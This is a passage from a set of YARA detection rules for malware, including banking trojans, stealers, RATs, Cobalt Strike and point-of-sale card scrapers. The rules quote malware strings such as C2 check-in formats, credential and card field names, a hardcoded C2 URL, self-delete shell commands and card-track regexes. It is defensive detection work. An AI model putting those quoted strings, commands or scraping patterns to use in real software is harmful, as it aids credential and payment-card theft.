= "2017-06-25" strings: $a0 = "META-INF/MANIFEST.MF" $a1 = /Main(\$)Q[0-9][0-9][0-9][0-9]/ $PK = "PK" condition: $PK at 0 and $a0 and $a1 } rule hancitor { meta: description = "Memory string yara for Hancitor" author = "J from THL <j@techhelplist.com>" reference1 = "https://researchcenter.paloaltonetworks.com/2018/02/threat-brief-hancitor-actors/" reference2 = "https://www.virustotal.com/#/file/43e17f30b78c085e9bda8cadf5063cd5cec9edaa7441594ba1fe51391cc1c486/" reference3 = "https://www.virustotal.com/#/file/d135f03b9fdc709651ac9d0264e155c5580b072577a8ff24c90183b126b5e12a/" date = "2018-09-18" maltype1 = "Botnet" filetype = "memory" strings: $a = "GUID=" ascii $b = "&BUILD=" ascii $c = "&INFO=" ascii $d = "&IP=" ascii $e = "&TYPE=" ascii $f = "php|http" ascii $g = "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d" ascii fullword condition: 5 of ($a,$b,$c,$d,$e,$f) or $g } rule mimikatz_kirbi_ticket { meta: description = "KiRBi ticket for mimikatz" author = "Benjamin DELPY (gentilkiwi); Didier Stevens" strings: $asn1 = { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 } $asn1_84 = { 76 84 ?? ?? ?? ?? 30 84 ?? ?? ?? ?? a0 84 00 00 00 03 02 01 05 a1 84 00 00 00 03 02 01 16 } condition: $asn1 at 0 or $asn1_84 at 0 } rule kpot { meta: author = " J from THL <j@techhelplist.com>" date = "2018-08-29" reference1 = "https://www.virustotal.com/#/file/4e87a0794bf73d06ac1ce4a37e33eb832ff4c89fb9e4266490c7cef9229d27a7/detection" reference2 = "ETPRO TROJAN KPOT Stealer Check-In [2832358]" reference3 = "ETPRO TROJAN KPOT Stealer Exfiltration [2832359]" version = 1 maltype = "Stealer" filetype = "memory" strings: $text01 = "bot_id=%s" $text02 = "x64=%d" $text03 = "is_admin=%d" $text04 = "IL=%d" $text05 = "os_version=%d" $text06 = "IP: %S" $text07 = "MachineGuid: %s" $text08 = "CPU: %S (%d cores)" $text09 = "RAM: %S MB" $text10 = "Screen: %dx%d" $text11 = "PC: %s" $text12 = "User: %s" $text13 = "LT: %S (UTC+%d:%d)" $text14 = "%s/%s.php" $text15 = "Host: %s" $text16 = "username_value" $text17 = "password_value" $text18 = "name_on_card" $text19 = "last_four" $text20 = "exp_month" $text21 = "exp_year" $text22 = "bank_name" condition: 16 of them } rule marap { meta: author = " J from THL <j@techhelplist.com>" date = "2018-08-19" reference1 = "https://www.virustotal.com/#/file/61dfc4d535d86359c2f09dbdd8f14c0a2e6367e5bb7377812f323a94d32341ba/detection" reference2 = "https://www.virustotal.com/#/file/c0c85f93a4f425a23c2659dce11e3b1c8b9353b566751b32fcb76b3d8b723b94/detection" reference3 = "https://threatpost.com/highly-flexible-marap-malware-enters-the-financial-scene/136623/" reference4 = "https://www.bleepingcomputer.com/news/security/necurs-botnet-pushing-new-marap-malware/" version = 1 maltype = "Downloader" filetype = "memory" strings: $text01 = "%02X-%02X-%02X-%02X-%02X-%02X" wide $text02 = "%s, base=0x%p" wide $text03 = "pid=%d" wide $text04 = "%s %s" wide $text05 = "%d|%d|%s|%s|%s" wide $text06 = "%s|1|%d|%d|%d|%d|%d|%s" wide $text07 = "%d#%s#%s#%s#%d#%s#%s#%d#%s#%s#%s#%s#%d" wide $text08 = "%s|1|%d|%d|%d|%d|%d|%s#%s#%s#%s#%d#%d#%d" wide $text09 = "%s|0|%d" wide $text10 = "%llx" wide $text11 = "%s -a" wide condition: 7 of them } rule shifu_shiz { meta: description = "Memory string yara for Shifu/Shiz" author = "J from THL <j@techhelplist.com>" reference1 = "https://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" reference2 = "https://beta.virusbay.io/sample/browse/24a6dfaa98012a839658c143475a1e46" reference3 = "https://raw.githubusercontent.com/Neo23x0/signature-base/master/yara/crime_shifu_trojan.yar" date = "2018-03-16" maltype1 = "Banker" maltype2 = "Keylogger" maltype3 = "Stealer" filetype = "memory" strings: $aa = "auth_loginByPassword" fullword ascii $ab = "back_command" fullword ascii $ac = "back_custom1" fullword ascii $ad = "GetClipboardData" fullword ascii $ae = "iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe" fullword ascii $af = "mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe" fullword ascii $ag = "svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe" fullword ascii $ah = "!inject" fullword ascii $ai = "!deactivebc" fullword ascii $aj = "!kill_os" fullword ascii $ak = "!load" fullword ascii $al = "!new_config" fullword ascii $am = "!activebc" fullword ascii $an = "keylog.txt" fullword ascii $ao = "keys_path.txt" fullword ascii $ap = "pass.log" fullword ascii $aq = "passwords.txt" fullword ascii $ar = "Content-Disposition: form-data; name=\"file\"; filename=\"report\"" fullword ascii $as = "Content-Disposition: form-data; name=\"pcname\"" fullword ascii $at = "botid=%s&ver=" fullword ascii $au = "action=auth&np=&login=" fullword ascii $av = "&ctl00%24MainMenu%24Login1%24UserName=" fullword ascii $aw = "&cvv=" fullword ascii $ax = "&cvv2=" fullword ascii $ay = "&domain=" fullword ascii $az = "LOGIN_AUTHORIZATION_CODE=" fullword ascii $ba = "name=%s&port=%u" fullword ascii $bb = "PeekNamedPipe" fullword ascii $bc = "[pst]" fullword ascii $bd = "[ret]" fullword ascii $be = "[tab]" fullword ascii $bf = "[bks]" fullword ascii $bg = "[del]" fullword ascii $bh = "[ins]" fullword ascii $bi = "&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d&cn=" fullword ascii condition: 18 of them } rule sitrof_fortis_scar { meta: author = "J from THL <j@techhelplist.com>" date = "2018/23" reference1 = "https://www.virustotal.com/#/file/59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c/community" reference2 = "ETPRO rule 2806032, ETPRO TROJAN Win32.Scar.hhrw POST" version = 2 maltype = "Stealer" filetype = "memory" strings: $a = "?get&version" $b = "?reg&ver=" $c = "?get&exe" $d = "?get&download" $e = "?get&module" $f = "&ver=" $g = "&comp=" $h = "&addinfo=" $i = "%s@%s; %s %s \"%s\" processor(s)" $j = "User-Agent: fortis" condition: 6 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule viotto_keylogger { strings: $hdr = "MZ" $s1 = "Viotto Keylogger" $s2 = "msvbvm60" $s3 = "FtpPutFileA" $s4 = "VBA6" $s5 = "SetWindowsHookExA" condition: ($hdr at 0) and all of ($s*) } rule xDedic_SysScan_unpacked : crimeware { meta: author = " Kaspersky Lab" ref = "https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf" maltype = "crimeware" type ="crimeware" filetype = "Win32 EXE" date = "2016-03-14" version = "1.0" hash = "fac495be1c71012682ebb27092060b43" hash = "e8cc69231e209db7968397e8a244d104" hash = "a53847a51561a7e76fd034043b9aa36d" hash = "e8691fa5872c528cd8e72b82e7880e98" hash = "F661b50d45400e7052a2427919e2f777" strings: $a1="/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"" ascii wide $a2="SysScan DEBUG Mode!!!" ascii wide $a3="This rechecking? (set 0/1 or press enter key)" ascii wide $a4="http://37.49.224.144:8189/manual_result" ascii wide $b1="Checker end work!" ascii wide $b2="Trying send result..." ascii wide condition: ((uint16(0) == 0x5A4D)) and (filesize < 5000000) and ((any of ($a*)) or (all of ($b*))) } import "pe" rule xdedic_packed_syscan : crimeware { meta: author = "Kaspersky Lab" company = "Kaspersky Lab" ref = "https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf" strings: $a1 = "SysScan.exe" nocase ascii wide condition: uint16(0) == 0x5A4D and any of ($a*) and filesize > 1000000 and filesize <1200000 and pe.number_of_sections == 13 and pe.version_info["FileVersion"] contains "1.3.4." } /* YARA Rule Set for MalConfScan Author: JPCERT/CC Incident Response Group Date: 2019/04/22 Reference: https://github.com/JPCERTCC/MalConfScan/ */ rule TSCookie { meta: description = "detect TSCookie in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" hash1 = "6d2f5675630d0dae65a796ac624fb90f42f35fbe5dec2ec8f4adce5ebfaabf75" strings: $v1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" wide $b1 = { 68 D4 08 00 00 } condition: all of them } rule TSC_Loader { meta: description = "detect TSCookie Loader in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" wide $b1 = { 68 78 0B 00 00 } condition: all of them } rule CobaltStrike { meta: description = "detect CobaltStrike Beacon in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html" hash1 = "154db8746a9d0244146648006cc94f120390587e02677b97f044c25870d512c3" hash2 = "f9b93c92ed50743cd004532ab379e3135197b6fb5341322975f4d7a98a0fcde7" strings: $v1 = { 73 70 72 6E 67 00 } $v2 = { 69 69 69 69 69 69 69 69 } condition: all of them } rule RedLeaves { meta: description = "detect RedLeaves in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory block scan" reference = "https://blogs.jpcert.or.jp/en/2017/05/volatility-plugin-for-detecting-redleaves-malware.html" hash1 = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481" strings: $v1 = "red_autumnal_leaves_dllmain.dll" $b1 = { FF FF 90 00 } condition: $v1 and $b1 at 0 } rule Himawari { meta: description = "detect Himawari(a variant of RedLeaves) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf" hash1 = "3938436ab73dcd10c495354546265d5498013a6d17d9c4f842507be26ea8fafb" strings: $h1 = "himawariA" $h2 = "himawariB" $h3 = "HimawariDemo" condition: all of them } rule Lavender { meta: description = "detect Lavender(a variant of RedLeaves) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d" strings: $a1 = { C7 ?? ?? 4C 41 56 45 } $a2 = { C7 ?? ?? 4E 44 45 52 } condition: all of them } rule Armadill { meta: description = "detect Armadill(a variant of RedLeaves) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $a1 = { C7 ?? ?? 41 72 6D 61 } $a2 = { C7 ?? ?? 64 69 6C 6C } condition: all of them } rule zark20rk { meta: description = "detect zark20rk(a variant of RedLeaves) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "d95ad7bbc15fdd112594584d92f0bff2c348f48c748c07930a2c4cc6502cd4b0" strings: $a1 = { C7 ?? ?? 7A 61 72 6B } $a2 = { C7 ?? ?? 32 30 72 6B } condition: all of them } rule Ursnif { meta: description = "detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "0207c06879fb4a2ddaffecc3a6713f2605cbdd90fc238da9845e88ff6aef3f85" hash2 = "ff2aa9bd3b9b3525bae0832d1e2b7c6dfb988dc7add310088609872ad9a7e714" hash3 = "1eca399763808be89d2e58e1b5e242324d60e16c0f3b5012b0070499ab482510" strings: $a1 = "soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" $b1 = "client.dll" fullword $c1 = "version=%u" $c2 = "user=%08x%08x%08x%08x" $c3 = "server=%u" $c4 = "id=%u" $c5 = "crc=%u" $c6 = "guid=%08x%08x%08x%08x" $c7 = "name=%s" $c8 = "soft=%u" $d1 = "%s://%s%s" $d2 = "PRI \x2A HTTP/2.0" $e1 = { A1 ?? ?? ?? 00 35 E7 F7 8A 40 50 } $e2 = { 56 56 56 6A 06 5? FF ?? ?? ?? ?? 00 } $f1 = { 56 57 BE ?? ?? ?? ?? 8D ?? ?? A5 A5 A5 } $f2 = { 35 8F E3 B7 3F } $f3 = { 35 0A 60 2E 51 } condition: $a1 or ($b1 and 3 of ($c*)) or (5 of ($c*)) or ($b1 and all of ($d*)) or all of ($e*) or all of ($f*) } rule Emotet { meta: description = "detect Emotet in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v4a = { BB 00 C3 4C 84 } $v4b = { B8 00 C3 CC 84 } $v5a = { 69 01 6D 4E C6 41 05 39 30 00 00 } $v5b = { 6D 4E C6 41 33 D2 81 C1 39 30 00 00 } condition: ($v4a and $v4b) or $v5a or $v5b } rule SmokeLoader { meta: description = "detect SmokeLoader in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" strings: $a1 = { B8 25 30 38 58 } $b1 = { 81 3D ?? ?? ?? ?? 25 00 41 00 } $c1 = { C7 ?? ?? ?? 25 73 25 73 } condition: $a1 and $b1 and $c1 } rule Datper { meta: description = "detect Datper in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://blogs.jpcert.or.jp/en/2017/08/detecting-datper-malware-from-proxy-logs.html" strings: $a1 = { E8 03 00 00 } $b1 = "|||" $c1 = "Content-Type: application/x-www-form-urlencoded" $push7530h64 = { C7 C1 30 75 00 00 } $push7530h = { 68 30 75 00 00 } condition: $a1 and $b1 and $c1 and ($push7530h64 or $push7530h) } rule PlugX { meta: description = "detect PlugX in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = { 47 55 4c 50 00 00 00 00 } $v2a = { 68 40 25 00 00 } $v2c = { 68 58 2D 00 00 } $v2b = { 68 a0 02 00 00 } $v2d = { 68 a4 36 00 00 } $v2e = { 8D 46 10 68 } $v2f = { 68 24 0D 00 00 } $v2g = { 68 a0 02 00 00 } $v2h = { 68 e4 0a 00 00 } $enc1 = { C1 E? 03 C1 E? 07 2B ?? } $enc2 = { 32 5? ?? 81 E? ?? ?? 00 00 2A 5? ?? 89 ?? ?? 32 ?? 2A ?? 32 5? ?? 2A 5? ?? 32 } $enc3 = { B? 33 33 33 33 } $enc4 = { B? 44 44 44 44 } condition: $v1 at 0 or ($v2a and $v2b and $enc1) or ($v2c and $v2b and $enc1) or ($v2d and $v2b and $enc2) or ($v2d and $v2e and $enc2) or ($v2f and $v2g and $enc3 and $enc4) or ($v2h and $v2g and $enc3 and $enc4) } rule Ramnit { meta: description = "detect Ramnit" author = "nazywam" module = "ramnit" reference = "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/" strings: $guid = "{%08X-%04X-%04X-%04X-%08X%04X}" $md5_magic_1 = "15Bn99gT" $md5_magic_2 = "1E4hNy1O" $init_dga = { C7 ?? ?? ?? ?? ?? FF FF FF FF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? } $xor_secret = { 8A ?? ?? 32 ?? 88 ?? 4? 4? E2 ?? } $init_function = { FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 [4] FF 35 [4] 68 [4] 68 [2] 00 00 68 [4] E8 } $dga_rand_int = { B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 } $cookies = "cookies4.dat" $s3 = "pdatesDisableNotify" $get_domains = { a3 [4] a1 [4] 80 3? 00 75 ?? c7 05 [4] ff ff ff ff ff 35 [4] ff 35 [4] ff 35 [4] e8 } $add_tld = { 55 8B EC 83 ?? ?? 57 C7 ?? ?? 00 00 00 00 B? ?? ?? ?? ?? 8B ?? ?? 3B ?? ?? 75 ?? 8B ?? } $get_port = { 90 68 [4] 68 [4] FF 35 [4] FF 35 [4] E8 [4] 83 } condition: $init_dga and $init_function and 2 of ($guid, $md5_magic_*, $cookies, $s3) and any of ( $get_port, $add_tld, $dga_rand_int, $get_domains, $xor_secret) } rule Hawkeye { meta: description = "detect HawkEye in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $hawkstr1 = "HawkEye Keylogger" wide $hawkstr2 = "Dear HawkEye Customers!" wide $hawkstr3 = "HawkEye Logger Details:" wide condition: all of them } rule Lokibot { meta: description = "detect Lokibot in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c" strings: $des3 = { 68 03 66 00 00 } $param = "MAC=%02X%02X%02XINSTALL=%08X%08X" $string = { 2d 00 75 00 00 00 46 75 63 6b 61 76 2e 72 75 00 00} condition: all of them } rule Bebloh { meta: description = "detect Bebloh(a.k.a. URLZone) in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $crc32f = { b8 EE 56 0b ca } $dga = "qwertyuiopasdfghjklzxcvbnm123945678" $post1 = "&vcmd=" $post2 = "?tver=" condition: all of them } rule xxmm { meta: description = "detect xxmm in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "setupParameter:" $v2 = "loaderParameter:" $v3 = "parameter:" condition: all of them } rule Azorult { meta: description = "detect Azorult in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)" $v2 = "http://ip-api.com/json" $v3 = { c6 07 1e c6 47 01 15 c6 47 02 34 } condition: all of them } rule PoisonIvy { meta: description = "detect PoisonIvy in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $a1 = { 0E 89 02 44 } $b1 = { AD D1 34 41 } $c1 = { 66 35 20 83 66 81 F3 B8 ED } condition: all of them } rule netwire { meta: description = "detect netwire in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "HostId-%Rand%" $v2 = "mozsqlite3" $v3 = "[Scroll Lock]" $v4 = "GetRawInputData" $ping = "ping 192.0.2.2" $log = "[Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" condition: ($v1) or ($v2 and $v3 and $v4) or ($ping and $log) } rule Nanocore { meta: description = "detect Nanocore in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $v1 = "NanoCore Client" $v2 = "PluginCommand" $v3 = "CommandType" condition: all of them } rule Formbook { meta: description = "detect Formbook in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $sqlite3step = { 68 34 1c 7b e1 } $sqlite3text = { 68 38 2a 90 c5 } $sqlite3blob = { 68 53 d8 7f 8c } condition: all of them } rule Agenttesla_type1 { meta: description = "detect Agenttesla in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" strings: $iestr = "C:\\\\Users\\\\Admin\\\\Desktop\\\\IELibrary\\\\IELibrary\\\\obj\\\\Debug\\\\IELibrary.pdb" $atstr = "C:\\\\Users\\\\Admin\\\\Desktop\\\\ConsoleApp1\\\\ConsoleApp1\\\\obj\\\\Debug\\\\ConsoleApp1.pdb" $sqlitestr = "Not a valid SQLite 3 Database File" wide condition: all of them } rule Agenttesla_type2 { meta: description = "detect Agenttesla in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "internal research" hash1 = "670a00c65eb6f7c48c1e961068a1cb7fd3653bd29377161cd04bf15c9d010da2 " strings: $type2db1 = "1.85 (Hash, version 2, native byte-order)" wide $type2db2 = "Unknow database format" wide $type2db3 = "SQLite format 3" wide condition: all of them } rule Noderat { meta: description = "detect Noderat in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" reference = "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html" strings: $config = "/config/app.json" $key = "/config/.regeditKey.rc" $message = "uninstall error when readFileSync: " condition: all of them } rule Njrat2 { meta: description = "detect njRAT in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" hash1 = "d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d" strings: $reg = "SEE_MASK_NOZONECHECKS" wide fullword $msg = "Execute ERROR" wide fullword $ping = "cmd.exe /c ping 0 -n 2 & del" wide fullword condition: all of them } rule Trickbot { meta: description = "detect TrickBot in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" hash1 = "2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c" strings: $tagm1 = "<mcconf><ver>" wide $tagm2 = "</autorun></mcconf>" wide $tagc1 = "<moduleconfig><autostart>" wide $tagc2 = "</autoconf></moduleconfig>" wide $tagi1 = "<igroup><dinj>" wide $tagi2 = "</dinj></igroup>" wide $tags1 = "<servconf><expir>" wide $tags2 = "</plugins></servconf>" wide $tagl1 = "<slist><sinj>" wide $tagl2 = "</sinj></slist>" wide condition: all of ($tagm*) or all of ($tagc*) or all of ($tagi*) or all of ($tags*) or all of ($tagl*) } rule Remcos { meta: description = "detect Remcos in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" hash1 = "7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5" strings: $remcos = "Remcos" ascii fullword $url = "Breaking-Security.Net" ascii fullword $resource = "SETTINGS" wide fullword condition: all of them } rule Quasar { meta: description = "detect Remcos in memory" author = "JPCERT/CC Incident Response Group" rule_usage = "memory scan" hash1 = "390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724" strings: $quasarstr1 = "Client.exe" wide $quasarstr2 = "({0}:{1}:{2})" wide $class = { 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 73 00 00 17 69 00 6E 00 66 00 6F 00 72 00 6D 00 61 00 74 00 69 00 6F 00 6E 00 00 80 } condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ // Point of Sale (POS) Malware and Tools used during POS compromises rule blackpos_v2 { meta: author = "@patrickrolsen" version = "0.1" reference = "http://blog.nuix.com/2014/09/08/blackpos-v2-new-variant-or-different-family" strings: $s1 = "Usage: -[start|stop|install|uninstall" $s2 = "\\SYSTEM32\\sc.exe config LanmanWorkstation" $s3 = "t.bat" $s4 = "mcfmisvc" condition: uint16(0) == 0x5A4D and all of ($s*) } rule dump_tool { meta: author = "@patrickrolsen" reference = "Related to pwdump6 and fgdump tools" strings: $s1 = "lsremora" $s2 = "servpw" $s3 = "failed: %d" $s4 = "fgdump" $s5 = "fgexec" $s6 = "fgexecpipe" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule osql_tool { meta: author = "@patrickrolsen" reference = "O/I SQL - SQL query tool" filetype = "EXE" version = "0.1" date = "1/30/2014" strings: $s1 = "osql\\src" $s2 = "OSQLUSER" $s3 = "OSQLPASSWORD" $s4 = "OSQLSERVER" condition: uint16(0) == 0x5A4D and (all of ($s*)) } rule misc_pos { meta: author = "@patrickrolsen" reference = "POS Malware" strings: $s1 = "KAPTOXA" $s2 = "cmd /c net start %s" $s3 = "pid:" $s4 = "%ADD%" $s5 = "COMSPEC" $s6 = "KARTOXA" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule unknown { meta: author = "@patrickrolsen" reference = "Unknown POS" strings: $s1 = "a.exe" wide $s2 = "Can anyone test" wide $s3 = "I m in computer class now" wide condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule regex_pos { meta: author = "@patrickrolsen" reference = "POS malware - Regex" strings: $n1 = "REGEXEND" nocase $n2 = "RegExpr" nocase $n3 = "regex" $s4 = "[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s5 = "[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s6 = "(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s7 = "(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s8 = "(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" $s9 = "([0-9]{15,16}[D=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})" $s10 = "((b|B)[0-9]{13,19}\\^[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})" $s11 = "[0-9]*\\^[a-zA-Z]*/[a-zA-Z ]*\\^[0-9]*" $s12 = "\\d{15,19}=\\d{13,}" $s13 = "\\;?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??" $s14 = "[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*" condition: uint16(0) == 0x5A4D and 1 of ($n*) and 1 of ($s*) } rule regexpr_pos { meta: author = "@patrickrolsen" reference = "POS malware - RegExpr" strings: $s1 = "RegExpr" nocase $s2 = "Data.txt" $s3 = "Track1" $s4 = "Track2" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule reg_pos { meta: author = "@patrickrolsen" reference = "POS malware - RegExpr" strings: $s1 = "T1_FOUND: %s" $s2 = "id=%s&log=%s" $s3 = "\\d{15,19}=\\d{13,}" condition: uint16(0) == 0x5A4D and 2 of ($s*) } rule sets_pos { meta: author = "@patrickrolsen" reference = "POS malware - Sets" strings: $s1 = "GET /sets.txt" condition: uint16(0) == 0x5A4D and $s1 } rule monitor_tool_pos { meta: author = "@patrickrolsen" reference = "POS malware - Monitoring Tool??" strings: $s1 = "RCPT TO" $s2 = "MAIL FROM" $s3 = "AUTH LOGIN" $s4 = "Reply-To" $s5 = "X-Mailer" $s6 = "crypto" $s7 = "test335.txt" wide $s8 = "/c del" condition: uint16(0) == 0x5A4D and 7 of ($s*) } rule pstgdump { meta: author = "@patrickrolsen" reference = "pstgdump" strings: $s1 = "fgdump\\pstgdump" $s2 = "pstgdump" $s3 = "Outlook" condition: uint16(0) == 0x5A4D and all of ($s*) } rule keyfinder_tool { meta: author = "@patrickrolsen" reference = "Magical Jelly Bean KeyFinder" strings: $s1 = "chgxp.vbs" $s2 = "officekey.exe" $s3 = "findkey.exe" $s4 = "xpkey.exe" condition: uint16(0) == 0x5A4D and 2 of ($s*) } rule memdump_diablo { meta: author = "@patrickrolsen" reference = "Process Memory Dumper - DiabloHorn" strings: $s1 = "DiabloHorn" $s2 = "Process Memory Dumper" $s3 = "pid-%s.dmp" $s4 = "Pid %d in not acessible" // SIC $s5 = "memdump.exe" $s6 = "%s-%d.dmp" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule blazingtools { meta: author = "@patrickrolsen" reference = "Blazing Tools - http://www.blazingtools.com (Keyloggers)" strings: $s1 = "blazingtools.com" $s2 = "Keystrokes" wide $s3 = "Screenshots" wide condition: uint16(0) == 0x5A4D and all of ($s*) } rule sysocmgr { meta: author = "@patrickrolsen" reference = "System stand-alone Optional Component Manager - http://support.microsoft.com/kb/222444" strings: $s1 = "SYSOCMGR.EXE" wide $s2 = "System stand-alone Optional Component Manager" wide condition: uint16(0) == 0x5A4D and all of ($s*) } rule lacy_keylogger { meta: author = "@patrickrolsen" reference = "Appears to be a form of keylogger." strings: $s1 = "Lacy.exe" wide $s2 = "Bldg Chive Duel Rip Query" wide condition: uint16(0) == 0x5A4D and all of ($s*) } rule searchinject { meta: author = "@patrickrolsen" reference = "Usage: SearchInject <PID1>[PID2][PID3] - It loads Searcher.dll (appears to be hard coded)" strings: $s1 = "SearchInject" $s2 = "inject base:" $s3 = "Searcher.dll" nocase condition: uint16(0) == 0x5A4D and all of ($s*) } rule heistenberg_pos { meta: author = "@patrickrolsen" reference = "POS Malware" strings: $s1 = "KARTOXA" $s2 = "dmpz.log" $s3 = "/api/process.php?xy=" $s4 = "User-Agent: PCICompliant" // PCICompliant/3.33 $s6 = "%s:*:Enabled:%s" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule pos_jack { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware" version = "0.1" reference = "http://blog.spiderlabs.com/2014/02/jackpos-the-house-always-wins.html" date = "2/22/2014" strings: $pdb1 = "\\ziedpirate.ziedpirate-PC\\" $pdb2 = "\\sop\\sop\\" condition: uint16(0) == 0x5A4D and 1 of ($pdb*) } rule pos_memory_scrapper_ { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware Memory Scraper" version = "0.3" description = "POS Memory Scraper" date = "01/30/2014" strings: $s1 = "kartoxa" nocase $s2 = "CC2 region:" $s3 = "CC memregion:" $s4 = "target pid:" $s5 = "scan all processes:" $s6 = "<pid> <PATTERN>" $s7 = "KAPTOXA" $s8 = "ATTERN" $s9 = "\\svhst%p" condition: uint16(0) == 0x5A4D and 3 of ($s*) } rule pos_malwre_dexter_stardust { meta: author = 